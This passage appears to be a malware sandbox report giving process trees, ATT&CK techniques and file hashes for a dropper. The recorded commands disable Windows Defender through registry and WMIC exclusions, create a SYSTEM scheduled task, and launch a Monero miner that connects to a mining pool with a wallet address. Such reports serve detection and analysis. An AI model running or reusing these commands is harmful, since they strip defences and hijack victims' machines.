        PID:2892
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:5156
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:5440
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:5364
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:3448
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:4840
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:5060
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3800
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:3740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5632
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:3612
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5780
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:5676
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 21:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS39F2.tmp\Install.exe\" it /wIididfobE 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:5036
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:5364
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:5208
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3408 -ip 3408
1⤵
PID:2108

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:3604
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:3640
- - C:\Windows\Temp\368491.exe
    "C:\Windows\Temp\368491.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2680

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:4512
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:4544

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:3552
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:1660
- - C:\Windows\Temp\779096.exe
    "C:\Windows\Temp\779096.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2900

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1816

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4928 -ip 4928
1⤵
PID:2124

C:\Users\Admin\AppData\Local\Temp\7zS2716.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS2716.tmp\Install.exe it /amwdidBjHT 385118 /S
1⤵
PID:5900
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5788
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4876
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:3932
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5032
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5164
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5244
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1508
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1684
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3112
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3884
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5680
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2124
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5800
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5816
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3168
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:2468
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5800
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5188

C:\Users\Admin\AppData\Local\Temp\7zS39F2.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS39F2.tmp\Install.exe it /wIididfobE 385118 /S
1⤵
PID:5648
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:3960
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:3812
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:3108
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4584
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5172
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5160
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5972
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:3164
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5936
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4284
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5980
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:1516
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6004
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5268
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:3972
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2012
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\GameService.exe

Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

Filesize
2.5MB

MD5
e6943a08bb91fc3086394c7314be367d

SHA1
451d2e171f906fa6c43f8b901cd41b0283d1fa40

